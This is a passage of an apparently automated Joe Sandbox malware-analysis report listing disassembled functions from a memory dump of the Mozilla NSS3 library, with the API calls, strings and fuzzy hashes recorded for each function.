calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6CF913BC,?,?,?,6CF91193), ref: 6CF91C6B
PR_NewLock.NSS3(?,6CF91193), ref: 6CF91C7E

Part of subcall function 6CF498D0: calloc.MOZGLUE(00000001,00000084,6CE70936,00000001,?,6CE7102C), ref: 6CF498E5

PR_NewCondVar.NSS3(00000000,?,6CF91193), ref: 6CF91C91

Part of subcall function 6CE6BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CE721BC), ref: 6CE6BB8C

PR_NewCondVar.NSS3(00000000,?,?,6CF91193), ref: 6CF91CA7

Part of subcall function 6CE6BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CE6BBEB
Part of subcall function 6CE6BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CE6BBFB
Part of subcall function 6CE6BB80: GetLastError.KERNEL32 ref: 6CE6BC03
Part of subcall function 6CE6BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CE6BC19
Part of subcall function 6CE6BB80: free.MOZGLUE(00000000), ref: 6CE6BC22

PR_NewCondVar.NSS3(00000000,?,?,?,6CF91193), ref: 6CF91CBE
PR_NewCondVar.NSS3(00000000,?,?,?,?,6CF91193), ref: 6CF91CD4
calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6CF91193), ref: 6CF91CFE
PR_Lock.NSS3(?,?,?,?,?,?,?,6CF91193), ref: 6CF91D1A

Part of subcall function 6CF49BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CE71A48), ref: 6CF49BB3
Part of subcall function 6CF49BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CE71A48), ref: 6CF49BC8

PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6CF91193), ref: 6CF91D3D

Part of subcall function 6CF2DD70: TlsGetValue.KERNEL32 ref: 6CF2DD8C
Part of subcall function 6CF2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CF2DDB4

PR_SetError.NSS3(FFFFE890,00000000,?,6CF91193), ref: 6CF91D4E
PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6CF91193), ref: 6CF91D64
PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6CF91193), ref: 6CF91D6F
PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6CF91193), ref: 6CF91D7B
PR_DestroyCondVar.NSS3(?,?,?,?,?,6CF91193), ref: 6CF91D87
PR_DestroyCondVar.NSS3(00000000,?,?,?,6CF91193), ref: 6CF91D93
PR_DestroyLock.NSS3(00000000,?,?,6CF91193), ref: 6CF91D9F
free.MOZGLUE(00000000,?,6CF91193), ref: 6CF91DA8

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
String ID:
API String ID: 3246495057-0
Opcode ID: a79ef0cf49be54ae78642fec753879bbdeeee8d682ab08e7961fc77e000ed988
Instruction ID: bc4a24bc0bb8d73a8a553911a9588b39f3ad135985329f1b3a9dcc6f1831d9c0
Opcode Fuzzy Hash: a79ef0cf49be54ae78642fec753879bbdeeee8d682ab08e7961fc77e000ed988
Instruction Fuzzy Hash: 0A31A2F1E106019BFB209F75AC01B977BB8AF0561CB148439E94A87B51FB31E518CBA2

Function 6CEA5E60 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 348COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CEA5ECF
EnterCriticalSection.KERNEL32(?), ref: 6CEA5EE3
PR_Unlock.NSS3(?), ref: 6CEA5F0A
PK11_MakeIDFromPubKey.NSS3(00000014), ref: 6CEA5FB5

Strings

S&l, xrefs: 6CEA5E6C, 6CEA627F, 6CEA5F12
S&l, xrefs: 6CEA62E3
NSS_USE_DECODED_CKA_EC_POINT, xrefs: 6CEA61F4

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalEnterFromK11_MakeSectionUnlockValue
String ID: NSS_USE_DECODED_CKA_EC_POINT$S&l$S&l
API String ID: 2280678669-148785157
Opcode ID: 2467b80fba857c30be6a757a3fb3d53ebd531b13caf7b931142ece3dc90c1784
Instruction ID: 6e92e5c0af72bfd82be0ae026dddcf4c11b94aaef474324906f5d34f48ee3830
Opcode Fuzzy Hash: 2467b80fba857c30be6a757a3fb3d53ebd531b13caf7b931142ece3dc90c1784
Instruction Fuzzy Hash: 50F106B5A012158FDB54CF68C884B86BBF4FF09308F6581AAD8089F746D774EA85CF91

Function 6CEF0C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,l), ref: 6CEF0C81

Part of subcall function 6CEDBE30: SECOID_FindOID_Util.NSS3(6CE9311B,00000000,?,6CE9311B,?), ref: 6CEDBE44

Part of subcall function 6CEC8500: SECOID_GetAlgorithmTag_Util.NSS3(6CEC95DC,00000000,00000000,00000000,?,6CEC95DC,00000000,00000000,?,6CEA7F4A,00000000,?,00000000,00000000), ref: 6CEC8517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CEF0CC4

Part of subcall function 6CEDFAB0: free.MOZGLUE(?,-00000001,?,?,6CE7F673,00000000,00000000), ref: 6CEDFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CEF0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CEF0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CEF0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CEF0D7D
free.MOZGLUE(00000000), ref: 6CEF0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CEF0DC1
free.MOZGLUE(00000000), ref: 6CEF0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CEF0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CEF0E0F

Part of subcall function 6CEC95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CEA7F4A,00000000,?,00000000,00000000), ref: 6CEC95E0
Part of subcall function 6CEC95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CEA7F4A,00000000,?,00000000,00000000), ref: 6CEC95F5
Part of subcall function 6CEC95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CEC9609
Part of subcall function 6CEC95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CEC961D
Part of subcall function 6CEC95C0: PK11_GetInternalSlot.NSS3 ref: 6CEC970B
Part of subcall function 6CEC95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CEC9756
Part of subcall function 6CEC95C0: PK11_GetIVLength.NSS3(?), ref: 6CEC9767
Part of subcall function 6CEC95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CEC977E
Part of subcall function 6CEC95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CEC978E

Strings

-$l, xrefs: 6CEF0C64
*,l, xrefs: 6CEF0C69, 6CEF0DE0, 6CEF0C80, 6CEF0C8B, 6CEF0CAF
*,l, xrefs: 6CEF0DCC

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,l$*,l$-$l
API String ID: 3136566230-2303401061
Opcode ID: d7d472fde5cc138a443bb6c38390a36dff29b0caecd5682fd8345d62c0cbfefc
Instruction ID: 2f9ce01815237cb4ba67450d4a8771c60b340df0b6eae4b047bb5157d09f7650
Opcode Fuzzy Hash: d7d472fde5cc138a443bb6c38390a36dff29b0caecd5682fd8345d62c0cbfefc
Instruction Fuzzy Hash: 3B41C4B5E00246ABEB009F64DC45BAF7674AF4534CF244028ED256B741EB36AA15CBF2

Function 6CEE5CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6CEE5EC0,00000000,?,?), ref: 6CEE5CBE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6CEE5CD7
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CEE5CF0
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CEE5D09
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6CEE5EC0,00000000,?,?), ref: 6CEE5D1F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6CEE5D3C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEE5D51
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEE5D66
PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6CEE5D80

Strings

dbm:, xrefs: 6CEE5D03, 6CEE5D60
NSS_DEFAULT_DB_TYPE, xrefs: 6CEE5D1A
multiaccess:, xrefs: 6CEE5CB8
extern:, xrefs: 6CEE5CEA, 6CEE5D4B
sql:, xrefs: 6CEE5CD1, 6CEE5D36

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: strncmp$SecureStrdup_Util
String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
API String ID: 1171493939-3017051476
Opcode ID: 4fe32d31e41698f6e280cdb60d461b61c56be0fb887b27becbec0b8dd4a6bd64
Instruction ID: b45aa46961758cae97358ab0a0d78b71f548631b1ec7c668f71ff9476240054f
Opcode Fuzzy Hash: 4fe32d31e41698f6e280cdb60d461b61c56be0fb887b27becbec0b8dd4a6bd64
Instruction Fuzzy Hash: C531E8E0B433435BE7411A249C4DB673779AF0A38CF340031EE55E6B82E772E915C656

Function 6CEE6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6CFB1DE0,?), ref: 6CEE6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEE6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CEE6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6CEE6D82
DER_GetInteger_Util.NSS3(?), ref: 6CEE6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CEE6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CEE6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CEE6F19
PK11_DigestBegin.NSS3(00000000), ref: 6CEE6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6CEE6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CEE7011
PK11_FreeSymKey.NSS3(00000000), ref: 6CEE7033
free.MOZGLUE(?), ref: 6CEE703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CEE7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CEE7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6CEE70AF

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 33521b861cf7448b88fd40797d5e949b4fdc997bb8d4b37bdd2c0b86271776ce
Instruction ID: 6be526f729d61e9eaa95cfcc1bb47dfe82d18153ca0d1ae0a5cb0fe98faf214d
Opcode Fuzzy Hash: 33521b861cf7448b88fd40797d5e949b4fdc997bb8d4b37bdd2c0b86271776ce
Instruction Fuzzy Hash: 73A126719042049BEB009F24DC46B6A36B9DB8938CF34893DEA19CBBD1E735D946C793

Function 6CEAAEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CE8AB95,00000000,?,00000000,00000000,00000000), ref: 6CEAAF25
EnterCriticalSection.KERNEL32(?,?,?,?,6CE8AB95,00000000,?,00000000,00000000,00000000), ref: 6CEAAF39
PR_Unlock.NSS3(?,?,?,6CE8AB95,00000000,?,00000000,00000000,00000000), ref: 6CEAAF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6CE8AB95,00000000,?,00000000,00000000,00000000), ref: 6CEAAF69
TlsGetValue.KERNEL32 ref: 6CEAB06B
EnterCriticalSection.KERNEL32(?), ref: 6CEAB083
PR_Unlock.NSS3(?), ref: 6CEAB0A4
TlsGetValue.KERNEL32 ref: 6CEAB0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6CEAB0D9
PR_Unlock.NSS3 ref: 6CEAB102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CEAB151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CEAB182

Part of subcall function 6CEDFAB0: free.MOZGLUE(?,-00000001,?,?,6CE7F673,00000000,00000000), ref: 6CEDFAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CEAB177

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6CE8AB95,00000000,?,00000000,00000000,00000000), ref: 6CEAB1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6CE8AB95,00000000,?,00000000,00000000,00000000), ref: 6CEAB1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6CE8AB95,00000000,?,00000000,00000000,00000000), ref: 6CEAB1C2

Part of subcall function 6CED1560: TlsGetValue.KERNEL32(00000000,?,6CEA0844,?), ref: 6CED157A
Part of subcall function 6CED1560: EnterCriticalSection.KERNEL32(?,?,?,6CEA0844,?), ref: 6CED158F
Part of subcall function 6CED1560: PR_Unlock.NSS3(?,?,?,?,6CEA0844,?), ref: 6CED15B2

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: 81a41f6a307dbf49fd8f13edc6306881af61b06f3fa4d2f4aef5b6951ad734e4
Instruction ID: b6298cf7cf26c60159cd562448bcf7b51b4a58078357ba0f340374d3c76d8a5c
Opcode Fuzzy Hash: 81a41f6a307dbf49fd8f13edc6306881af61b06f3fa4d2f4aef5b6951ad734e4
Instruction Fuzzy Hash: D0A1A5B5D00209AFEF009FA4DC41BEA77B4BF19308F244129E905AB751E735E956CBE1

Function 6CEA2C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?l,?,6CE9E477,?,?,?,00000001,00000000,?,?,6CEA3F23,?), ref: 6CEA2C62
EnterCriticalSection.KERNEL32(0000001C,?,6CE9E477,?,?,?,00000001,00000000,?,?,6CEA3F23,?), ref: 6CEA2C76
PL_HashTableLookup.NSS3(00000000,?,?,6CE9E477,?,?,?,00000001,00000000,?,?,6CEA3F23,?), ref: 6CEA2C86
PR_Unlock.NSS3(00000000,?,?,?,?,6CE9E477,?,?,?,00000001,00000000,?,?,6CEA3F23,?), ref: 6CEA2C93

Part of subcall function 6CF2DD70: TlsGetValue.KERNEL32 ref: 6CF2DD8C
Part of subcall function 6CF2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CF2DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6CE9E477,?,?,?,00000001,00000000,?,?,6CEA3F23,?), ref: 6CEA2CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CE9E477,?,?,?,00000001,00000000,?,?,6CEA3F23,?), ref: 6CEA2CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CE9E477,?,?,?,00000001,00000000,?,?,6CEA3F23), ref: 6CEA2CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CE9E477,?,?,?,00000001,00000000,?), ref: 6CEA2CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CE9E477,?,?,?,00000001,00000000,?), ref: 6CEA2D4D
EnterCriticalSection.KERNEL32(?), ref: 6CEA2D61
PL_HashTableLookup.NSS3(?,?), ref: 6CEA2D71
PR_Unlock.NSS3(?), ref: 6CEA2D7E

Part of subcall function 6CE707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CE0204A), ref: 6CE707AD
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CE0204A), ref: 6CE707CD
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CE0204A), ref: 6CE707D6
Part of subcall function 6CE707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CE0204A), ref: 6CE707E4
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,6CE0204A), ref: 6CE70864
Part of subcall function 6CE707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE70880
Part of subcall function 6CE707A0: TlsSetValue.KERNEL32(00000000,?,?,6CE0204A), ref: 6CE708CB
Part of subcall function 6CE707A0: TlsGetValue.KERNEL32(?,?,6CE0204A), ref: 6CE708D7
Part of subcall function 6CE707A0: TlsGetValue.KERNEL32(?,?,6CE0204A), ref: 6CE708FB

Strings

#?l, xrefs: 6CEA2C43

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?l
API String ID: 2446853827-1190849705
Opcode ID: 8535383a5915bf9d77a040df200159d742b0d5a9b8f099a25d63269cda3ffa01
Instruction ID: 4a43c0d63dd0b81580716564daba9c92032ad7ae9b3394554d7b18f776b6e4d1
Opcode Fuzzy Hash: 8535383a5915bf9d77a040df200159d742b0d5a9b8f099a25d63269cda3ffa01
Instruction Fuzzy Hash: D25105B6D00604AFDB009F65DC449AA7778BF1931CB248524ED1CABB12E731E959C7E1

Function 6CEFAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEFADB1

Part of subcall function 6CEDBE30: SECOID_FindOID_Util.NSS3(6CE9311B,00000000,?,6CE9311B,?), ref: 6CEDBE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CEFADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CEFAE08

Part of subcall function 6CEDB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CFB18D0,?), ref: 6CEDB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CEFAE25
PL_FreeArenaPool.NSS3 ref: 6CEFAE63
PR_CallOnce.NSS3(6CFE2AA4,6CEE12D0), ref: 6CEFAE4D

Part of subcall function 6CE04C70: TlsGetValue.KERNEL32(?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04C97
Part of subcall function 6CE04C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04CB0
Part of subcall function 6CE04C70: PR_Unlock.NSS3(?,?,?,?,?,6CE03921,6CFE14E4,6CF4CC70), ref: 6CE04CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEFAE93
PR_CallOnce.NSS3(6CFE2AA4,6CEE12D0), ref: 6CEFAECC
PL_FreeArenaPool.NSS3 ref: 6CEFAEDE
PL_FinishArenaPool.NSS3 ref: 6CEFAEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEFAEF5
PL_FinishArenaPool.NSS3 ref: 6CEFAF16

Strings

security, xrefs: 6CEFADEE

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 4cb0ca2494140601bc76082cf17076800c930aa98cc1e1eef0f77d080a2e2ae3
Instruction ID: 59df3a22373646a4cd275dddd02f3e9d44a34a19e1f72f622379387a67a63509
Opcode Fuzzy Hash: 4cb0ca2494140601bc76082cf17076800c930aa98cc1e1eef0f77d080a2e2ae3
Instruction Fuzzy Hash: 23413DB298021067F7214B14DC45BAA32B8AF4674CF300529E9749FF41FB35A98AC7D3

Function 6CF9AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CF49890: TlsGetValue.KERNEL32(?,?,?,6CF497EB), ref: 6CF4989E

EnterCriticalSection.KERNEL32(?), ref: 6CF9AF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6CF9AFCE
PR_SetPollableEvent.NSS3(?), ref: 6CF9AFD9
EnterCriticalSection.KERNEL32(?), ref: 6CF9AFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6CF9B00F
_PR_MD_UNLOCK.NSS3(?), ref: 6CF9B02F
_PR_MD_UNLOCK.NSS3(?), ref: 6CF9B070
PR_JoinThread.NSS3(?), ref: 6CF9B07B
free.MOZGLUE(?), ref: 6CF9B084
EnterCriticalSection.KERNEL32(?), ref: 6CF9B09B
_PR_MD_UNLOCK.NSS3(?), ref: 6CF9B0C4
PR_JoinThread.NSS3(?), ref: 6CF9B0F3
free.MOZGLUE(?), ref: 6CF9B0FC
PR_JoinThread.NSS3(?), ref: 6CF9B137
free.MOZGLUE(?), ref: 6CF9B140

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 33b6ca91a71f7bcf97d6629c2e4cf137d91b5499985970e80cb10081e0e71b6b
Instruction ID: eeae01afd2adca25b731092783c2ba2e39bd4a38d2db8e6c27d7d4038cda83e4
